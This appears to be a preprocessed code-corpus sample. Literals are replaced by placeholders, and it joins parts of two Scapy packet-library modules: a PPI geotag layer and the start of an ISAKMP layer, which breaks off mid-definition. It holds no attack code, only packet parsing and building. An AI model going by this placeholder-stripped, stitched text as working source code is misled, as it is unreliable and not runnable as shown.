<NUM_LIT> <EOL> x = int ( round ( ( x * <NUM_LIT> ) ) ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class UTCTimeField ( IntField ) : <EOL> def __init__ ( self , name , default , epoch = time . gmtime ( <NUM_LIT:0> ) , strf = "<STR_LIT>" ) : <EOL> IntField . __init__ ( self , name , default ) <EOL> self . epoch = epoch <EOL> self . delta = time . mktime ( epoch ) - time . mktime ( time . gmtime ( <NUM_LIT:0> ) ) <EOL> self . strf = strf <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> x = <NUM_LIT:0> <EOL> x = int ( x ) + self . delta <EOL> t = time . strftime ( self . strf , time . gmtime ( x ) ) <EOL> return "<STR_LIT>" % ( t , x ) <EOL> class LETimeField ( UTCTimeField , LEIntField ) : <EOL> def __init__ ( self , name , default , epoch = time . gmtime ( <NUM_LIT:0> ) , strf = "<STR_LIT>" ) : <EOL> LEIntField . __init__ ( self , name , default ) <EOL> self . epoch = epoch <EOL> self . delta = time . mktime ( epoch ) - time . mktime ( time . gmtime ( <NUM_LIT:0> ) ) <EOL> self . strf = strf <EOL> class SignedByteField ( Field ) : <EOL> def __init__ ( self , name , default ) : <EOL> Field . __init__ ( self , name , default , "<STR_LIT:b>" ) <EOL> def randval ( self ) : <EOL> return RandSByte ( ) <EOL> class XLEShortField ( LEShortField , XShortField ) : <EOL> def i2repr ( self , pkt , x ) : <EOL> return XShortField . i2repr ( self , pkt , x ) <EOL> class XLEIntField ( LEIntField , XIntField ) : <EOL> def i2repr ( self , pkt , x ) : <EOL> return XIntField . i2repr ( self , pkt , x ) <EOL> class GPSTime_Field ( LETimeField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return LETimeField . __init__ ( self , name , default , strf = "<STR_LIT>" ) <EOL> class VectorFlags_Field ( XLEIntField ) : <EOL> """<STR_LIT>""" <EOL> _fwdstr = "<STR_LIT>" <EOL> _resmask = <NUM_LIT> <EOL> _relmask = <NUM_LIT> <EOL> _relnames = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _relvals = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> return str ( x ) <EOL> r = [ ] <EOL> if ( x & <NUM_LIT> ) : <EOL> r . append ( self . _fwdstr ) <EOL> i = ( x & self . _relmask ) >> <NUM_LIT:1> <EOL> r . append ( self . _relnames [ i ] ) <EOL> i = x & self . _resmask <EOL> if ( i ) : <EOL> r . append ( "<STR_LIT>" % i ) <EOL> sout = "<STR_LIT:+>" . join ( r ) <EOL> return sout <EOL> def any2i ( self , pkt , x ) : <EOL> if type ( x ) is str : <EOL> r = x . split ( "<STR_LIT:+>" ) <EOL> y = <NUM_LIT:0> <EOL> for value in r : <EOL> if ( value == self . _fwdstr ) : <EOL> y |= <NUM_LIT> <EOL> elif ( value in self . _relnames ) : <EOL> i = self . _relnames . index ( value ) <EOL> y &= ( ~ self . _relmask ) <EOL> y |= self . _relvals [ i ] <EOL> else : <EOL> pass <EOL> else : <EOL> y = x <EOL> return y <EOL> class HCSIFlagsField ( FlagsField ) : <EOL> """<STR_LIT>""" <EOL> def i2m ( self , pkt , val ) : <EOL> if val is None : <EOL> val = <NUM_LIT:0> <EOL> if ( pkt ) : <EOL> for i in range ( len ( self . names ) ) : <EOL> name = self . names [ i ] [ <NUM_LIT:0> ] <EOL> value = pkt . getfieldval ( name ) <EOL> if value is not None : <EOL> val |= <NUM_LIT:1> << i <EOL> return val <EOL> class HCSINullField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . __init__ ( self , name , default , length = <NUM_LIT:0> ) <EOL> class HCSIDescField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . __init__ ( self , name , default , length = <NUM_LIT:32> ) <EOL> class HCSIAppField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . __init__ ( self , name , default , length = <NUM_LIT> ) <EOL> def _FlagsList ( myfields ) : <EOL> flags = [ ] <EOL> for i in range ( <NUM_LIT:32> ) : <EOL> flags . append ( "<STR_LIT>" % i ) <EOL> for i in myfields . keys ( ) : <EOL> flags [ i ] = myfields [ i ] <EOL> return flags <EOL> _hcsi_gps_flags = _FlagsList ( { <NUM_LIT:0> : "<STR_LIT>" , <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <NUM_LIT:8> : "<STR_LIT>" } ) <EOL> _hcsi_vector_char_flags = _FlagsList ( { <NUM_LIT:0> : "<STR_LIT>" , <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <NUM_LIT:9> : "<STR_LIT>" , <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <NUM_LIT:12> : "<STR_LIT>" } ) <EOL> _hcsi_antenna_flags = _FlagsList ( { <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <NUM_LIT> : "<STR_LIT>" } ) <EOL> """<STR_LIT>""" <EOL> def _HCSITest ( pkt , ibit , name ) : <EOL> if pkt . present is None : <EOL> return ( pkt . getfieldval ( name ) is not None ) <EOL> return pkt . present & ibit <EOL> def _HCSIBuildFields ( fields ) : <EOL> names = [ f . name for f in fields ] <EOL> cond_fields = [ HCSIFlagsField ( '<STR_LIT>' , None , - len ( names ) , names ) ] <EOL> for i in range ( len ( names ) ) : <EOL> ibit = <NUM_LIT:1> << i <EOL> seval = "<STR_LIT>" % ( ibit , names [ i ] ) <EOL> test = eval ( seval ) <EOL> cond_fields . append ( ConditionalField ( fields [ i ] , test ) ) <EOL> return cond_fields <EOL> class HCSIPacket ( Packet ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , None ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] <EOL> def post_build ( self , p , pay ) : <EOL> if self . pfh_length is None : <EOL> l = len ( p ) - <NUM_LIT:4> <EOL> sl = struct . pack ( '<STR_LIT>' , l ) <EOL> p = p [ : <NUM_LIT:2> ] + sl + p [ <NUM_LIT:4> : ] <EOL> if self . geotag_len is None : <EOL> l_g = len ( p ) - <NUM_LIT:4> <EOL> sl_g = struct . pack ( '<STR_LIT>' , l_g ) <EOL> p = p [ : <NUM_LIT:6> ] + sl_g + p [ <NUM_LIT:8> : ] <EOL> p += pay <EOL> return p <EOL> def extract_padding ( self , p ) : <EOL> return "<STR_LIT>" , p <EOL> GPS_Fields = [ FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_gps_flags ) , <EOL> Fixed3_7Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_7Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> Fixed6_4Field ( "<STR_LIT>" , None ) , GPSTime_Field ( "<STR_LIT>" , None ) , <EOL> NSCounter_Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , NSCounter_Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class GPS ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_GPS ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( GPS_Fields ) <EOL> VEC_Fields = [ VectorFlags_Field ( "<STR_LIT>" , None ) , <EOL> FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_vector_char_flags ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> Fixed6_4Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Vector ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_VECTOR ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( VEC_Fields ) <EOL> sensor_types = { <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:100> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:1000> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" <EOL> } <EOL> SENS_Fields = [ LEShortEnumField ( '<STR_LIT>' , None , sensor_types ) , <EOL> SignedByteField ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Sensor ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_SENSOR ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( SENS_Fields ) <EOL> ANT_Fields = [ FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_antenna_flags ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , XLEShortField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , HCSIDescField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Antenna ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_ANTENNA ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( ANT_Fields ) <EOL> addPPIType ( PPI_GPS , GPS ) <EOL> addPPIType ( PPI_VECTOR , Vector ) <EOL> addPPIType ( PPI_SENSOR , Sensor ) <EOL> addPPIType ( PPI_ANTENNA , Antenna ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from scapy . packet import * <EOL> from scapy . fields import * <EOL> from scapy . ansmachine import * <EOL> from scapy . layers . inet import IP , UDP <EOL> from scapy . sendrecv import sr <EOL> ISAKMPAttributeTypes = { "<STR_LIT>" : ( <NUM_LIT:1> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT:8> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:2> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:3> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT:8> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:4> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:15> , <EOL> "<STR_LIT>" : <NUM_LIT:16> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:5> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:6> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:7> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:8> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:9> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:10> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:11> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:12> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:15> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:16> , { } , <NUM_LIT:1> ) , <EOL> } <EOL> ISAKMPTransformTypes = ISAKMPAttributeTypes <EOL> ISAKMPTransformNum = { } <EOL> for n in ISAKMPTransformTypes : <EOL> val = ISAKMPTransformTypes [ n ] <EOL> tmp = { } <EOL> for e in val [ <NUM_LIT:1> ] : <EOL> tmp [ val [ <NUM_LIT:1> ] [ e ] ] = e <EOL> ISAKMPTransformNum [ val [ <NUM_LIT:0> ] ] = ( n , tmp , val [ <NUM_LIT:2> ] ) <EOL> del ( n ) <EOL> del ( e ) <EOL> del ( tmp ) <EOL> del ( val ) <EOL> class ISAKMPTransformSetField ( StrLenField ) : <EOL> islist = <NUM_LIT:1> <EOL> def type2num ( self , typval ) : <EOL> typ = typval [ <NUM_LIT:0> ] <EOL> val = typval [ <NUM_LIT:1> ] <EOL> type_val , enc_dict , tlv = ISAKMPTransformTypes . get ( typval [ <NUM_LIT:0> ] , ( typval [ <NUM_LIT:0> ] , { } , <NUM_LIT:0> ) ) <EOL> val = enc_dict . get ( val , val ) <EOL> s = b"<STR_LIT>" <EOL> if ( val & ~ <NUM_LIT> ) : <EOL> if not tlv : <EOL> warning ( "<STR_LIT>" % typval [ <NUM_LIT:0> ] ) <EOL> n = <NUM_LIT:0> <EOL> while val : <EOL> s = bytes ( [ ( val & <NUM_LIT> ) ] ) + s <EOL> val >>= <NUM_LIT:8> <EOL> n += <NUM_LIT:1> <EOL> val = n <EOL> else : <EOL> type_val |= <NUM_LIT> <EOL> return struct . pack ( "<STR_LIT>" , type_val , val ) + s <EOL> def num2type ( self , typ , enc ) : <EOL> val = ISAKMPTransformNum . get ( typ , ( typ , { } ) ) <EOL> enc = val [ <NUM_LIT:1> ] . get ( enc , enc ) <EOL> return ( val [ <NUM_LIT:0> ] , enc ) <EOL> def i2m ( self , pkt , i ) : <EOL> if i is None : <EOL> return b"<STR_LIT>" <EOL> i = map ( self . type2num , i ) <EOL> return b"<STR_LIT>" . join ( i ) <EOL> def m2i ( self , pkt , m ) : <EOL> lst = [ ] <EOL> while len ( m ) >= <NUM_LIT:4> : <EOL> trans_type , = struct . unpack ( "<STR_LIT>" , m [ : <NUM_LIT:2> ] ) <EOL> is_tlv = not ( trans_type & <NUM_LIT> ) <EOL> if is_tlv : <EOL> value_len , = struct . unpack ( "<STR_LIT>" , m [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> if value_len + <NUM_LIT:4> > len ( m ) : <EOL> warning ( "<STR_LIT>" % trans_type ) <EOL> value = m [ <NUM_LIT:4> : <NUM_LIT:4> + value_len ] <EOL> r = <NUM_LIT:0> <EOL> for i in struct . unpack ( "<STR_LIT>" % ( "<STR_LIT:B>" * len ( value ) , ) , value ) : <EOL> r = ( r << <NUM_LIT:8> ) | i <EOL> value = r <EOL> else : <EOL> trans_type &= <NUM_LIT> <EOL> value_len = <NUM_LIT:0> <EOL> value , = struct . unpack ( "<STR_LIT>" , m [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> m = m [ <NUM_LIT:4> + value_len : ] <EOL> lst . append ( self . num2type ( trans_type , value ) ) <EOL> if len ( m ) > <NUM_LIT:0> : <EOL> warning ( "<STR_LIT>" % m ) <EOL> return lst <EOL> ISAKMP_payload_type = [ "<STR_LIT:None>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ISAKMP_exchange_type = [ "<STR_LIT:None>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:info>" ] <EOL> class ISAKMP_class ( Packet ) : <EOL> def guess_payload_class ( self , payload ) : <EOL> np = self . next_payload <EOL> if np == <NUM_LIT:0> : <EOL> return conf . raw_layer <EOL> elif np < len ( ISAKMP_payload_type ) : <EOL> pt = ISAKMP_payload_type [ np ] <EOL> return globals ( ) . get ( "<STR_LIT>" % pt , ISAKMP_payload ) <EOL> else : <EOL> return ISAKMP_payload <EOL> class ISAKMP ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> StrFixedLenField ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:8> ) , <EOL> StrFixedLenField ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:8> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , ISAKMP_payload_type ) , <EOL> XByteField ( "<STR_LIT:version>" , <NUM_LIT> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , ISAKMP_exchange_type ) , <EOL> FlagsField ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:8> , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> IntField ( "<STR_LIT:id>" , <NUM_LIT:0> ) , <EOL> IntField ( "<STR_LIT>" , None ) <EOL> ] <EOL> def guess_payload_class ( self , payload ) : <EOL> if self . flags & <NUM_LIT:1> : <EOL> return conf . raw_layer <EOL> return ISAKMP_class . guess_payload_class ( self , payload ) <EOL> def answers ( self , other ) : <EOL> if isinstance ( other , ISAKMP ) : <EOL> if other . init_cookie == self . init_cookie : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def post_build ( self , p , pay ) : <EOL> p += pay <EOL> if self . length is None : <EOL> p = p [ : <NUM_LIT> ] + struct . pack ( "<STR_LIT>" , len ( p ) ) + p [ <NUM_LIT> : ] <EOL> return p <EOL> class ISAKMP_payload_Transform ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ShortField ( "<STR_LIT>" , None ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> ByteEnumField ( "<STR_LIT:id>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> ShortField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ISAKMPTransformSetField ( "<STR_LIT>" , None , length_from = lambda x : x . length - <NUM_LIT:8> ) <EOL> ] <EOL> def post_build ( self , p , pay ) : <EOL> if self . length is None : <EOL> l = len ( p ) <EOL> p = p [ : <NUM_LIT:2> ] + bytes ( [ ( ( l >> <NUM_LIT:8> ) & <NUM_LIT> ) , ( l & <NUM_LIT> ) ] ) + p [ <NUM_LIT:4> : ] <EOL> p += pay <EOL> return p <EOL> class ISAKMP_payload_Proposal ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:8> ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:1> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:B>" ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . SPIsize ) , <EOL> PacketLenField ( "<STR_LIT>" , conf . raw_layer ( ) , ISAKMP_payload_Transform , length_from = lambda x : x . length - <NUM_LIT:8> ) , <EOL> ] <EOL> class ISAKMP_payload ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , 